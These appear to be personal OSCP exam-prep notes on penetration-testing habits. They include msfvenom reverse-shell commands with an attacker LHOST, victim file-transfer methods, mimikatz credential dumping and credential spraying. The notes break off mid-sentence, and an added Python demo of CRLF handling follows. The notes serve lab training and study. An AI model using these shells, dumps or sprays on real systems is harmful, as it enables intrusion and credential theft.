OSCP notes

A collection of unsorted bite-sized notes, “today I learned” style

  1. Get familiar with FTP and SMTP commands and how to use them over nc or telnet. It's very useful and you will need it.
    1. nc by default sends a LF character when you press enter, but some services expect CRLF. If you’re not getting output, start nc with the -C flag (see man nc).
  2. aspx shells generated with msfvenom depend on architecture. There’s a version for x86 and one for x64:
    1. `msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=192.168.45.XX LPORT=443 -o shell-x86.aspx`
    2. `msfvenom -f aspx -p windows/x64/shell_reverse_tcp LHOST=192.168.45.XX LPORT=443 -o shell-x64.aspx`
  3. Get familiar with the file formats associated with different web technologies. Very useful for file upload bypasses.
    1. https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/file-upload-bypass
    2. https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/file-upload
  4. Know as many different ways of transferring files as you can:
    1. start impacket-smbserver on your Kali and copy from/to a victim machine
    2. transfer with nc, scp, certutil, evil-winrm
    3. PowerShell has several methods for downloading/uploading files. These seem quite reliable and have been available since PowerShell v2.0: `iwr`, `(New-Object Net.WebClient).DownloadFile($url, $fullpath)`
    4. know FTP, both how to start a server on Kali and how to upload/download from the command line
    5. VBScript for older hosts (XP/2003)
    6. `python -m http.server 80`, or another option, updog
  5. You know of SecLists, but did you look through the repo? Many kinds of lists are in there (https://github.com/danielmiessler/SecLists), especially default passwords.
  6. This might sound dumb, but you'd be surprised. If you have unhealthy habits (sugar, coffee, sleeping patterns, nicotine), moderate them a bit in the 5-7 days leading up to exam day. You'll need the stamina and concentration.
  7. List msfconsole payloads with: `msfconsole -l payloads`
    1. Catch msfvenom stageless payloads with nc. Catch msfvenom staged payloads with msfconsole
  8. During the exam always have some recon scan going, but start with simpler initial scans, e.g. `-sC -sV`
  9. pyenv is very useful: it allows you to have multiple Python versions and environments. Many exploits require python2, and many tools have specific requirements that need to be satisfied.
  10. Make regular (weekly) snapshots of your VMs. But I know you'll forget anyway, regret it later, and then write it in your own "lessons learned" for the next person to forget it too.
    1. OK, you did backups, but are you prepared for your hard drive to die a week before the exam? It happened to me… lost installed tools and a few customizations on my Kali etc. Fortunately my notes were on Google Drive. (I was also able to recover the VM before the exam, so all is good.)
  11. Rabbit holes I fell into:
    1. Getting weird PowerShell errors because I was using a shell .ps1 from one repo and an enumeration .ps1 from another repo. There are different versions of Invoke-Mimikatz out there, and they are not necessarily compatible. If you're using a nishang reverse shell and want to do Invoke-Mimikatz, you should use the module from the nishang repo.
    2. On Linux usernames can be case sensitive.
    3. Failing to enumerate user folders properly (didn't see the hidden file that was the intended path).
    4. Getting stuck with a wrong version of mimikatz that was not working on my target system.
    5. Not enumerating SNMP properly: `snmpwalk -v2c -c public {RHOST} nsExtendObjects`
    6. Not seeing the output of a binary that was the intended path, because it didn't show in evil-winrm (but would show over other shells like impacket psexec or ConPtyShell). When possible, make an msfvenom payload and get a better shell.
    7. you can upload and download with evil-winrm, the command expects full paths
    8. Forgetting to do `token::elevate` and failing to get lsadump contents in mimikatz when all other commands would work.
    9. Not finding an exploit because it wasn't on exploit-db. Always google and search GitHub for exploits too.
    10. Forgetting to try default credentials. Always google for them, try admin:admin, username:username etc.
    11. If you find new credentials, try them on every service you know. If you find a new service, try every credential you have.
      1. also remember to spray all combinations to test for credential re-use
      2. when spraying with cme, also remember to do domain (-d lab.local) and local (--local-auth)
    12. If you escalate, re-enumerate: forgot to look at powershell history after escalation
    13. This one is dumb af… failed to enumerate properly because I mistyped or forgot the port number in my ffuf command. This happened a few times.
    14. In web enumeration, failed to enumerate with extensions and didn't find a .pdf that was the intended path. Do this when there are only a few ports open, or when all other options are exhausted.
    15. Had LFI and didn't look for default SSH key files (there are more possible files than id_rsa).
    16. there’s some weirdness with crackmapexec rdp where sometimes it doesn’t report a correct credential. also try impacket-rdp_check
    17. had domain creds and forgot to enumerate share contents. do --shares with crackmapexec or try smbclient/smbmap
    18. used wrong hashcat mode :’( check https://hashcat.net/wiki/doku.php?id=example_hashes
    19. Saw a suspicious binary on a windows target tried to run it and moved on; it was actually running on a schedule and I didn’t think to try and replace it with a reverse shell.
    20. After getting a foothold, didn’t realize there was a port that wasn’t accessible from outside
    21. Didn’t try an exploit because the version on the description was newer than my
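
Illustrating the LF vs CRLF point from item 1 (why plain nc can show no output and `nc -C` fixes it), as an added example that is not part of the original notes: a constructed local mock of a service that, like FTP and SMTP, only acts on CRLF-terminated lines. The port, banner and reply text are made up for the demo.

```python
import socket
import threading

HOST = "127.0.0.1"


def _strict_crlf_server(srv):
    """Constructed mock service: it only acts on CRLF-terminated lines, as
    FTP (RFC 959) and SMTP (RFC 5321) require. A command ending in a bare LF
    just sits in the buffer, so the client sees no reply at all."""
    while True:
        conn, _ = srv.accept()
        with conn:
            conn.sendall(b"220 mock service ready\r\n")
            buf = b""
            try:
                while True:
                    data = conn.recv(1024)
                    if not data:
                        break
                    buf += data
                    while b"\r\n" in buf:
                        line, buf = buf.split(b"\r\n", 1)
                        conn.sendall(b"250 got " + line + b"\r\n")
            except OSError:
                pass  # client went away mid-command; serve the next one


def start_mock_server():
    """Bind the mock to an ephemeral port, serve in the background, return the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((HOST, 0))
    srv.listen(5)
    threading.Thread(target=_strict_crlf_server, args=(srv,), daemon=True).start()
    return srv.getsockname()[1]


def send_command(port, command, crlf, timeout=1.0):
    """Send one command terminated like plain nc (LF) or nc -C (CRLF).
    Returns the decoded reply, or '' if the service stayed silent."""
    with socket.create_connection((HOST, port), timeout=timeout) as c:
        c.recv(1024)  # consume the greeting banner
        c.sendall(command.encode() + (b"\r\n" if crlf else b"\n"))
        try:
            return c.recv(1024).decode()
        except socket.timeout:
            return ""


if __name__ == "__main__":
    p = start_mock_server()
    print("LF   ->", repr(send_command(p, "HELO test", crlf=False)))  # ''
    print("CRLF ->", repr(send_command(p, "HELO test", crlf=True)))   # '250 got HELO test\r\n'
```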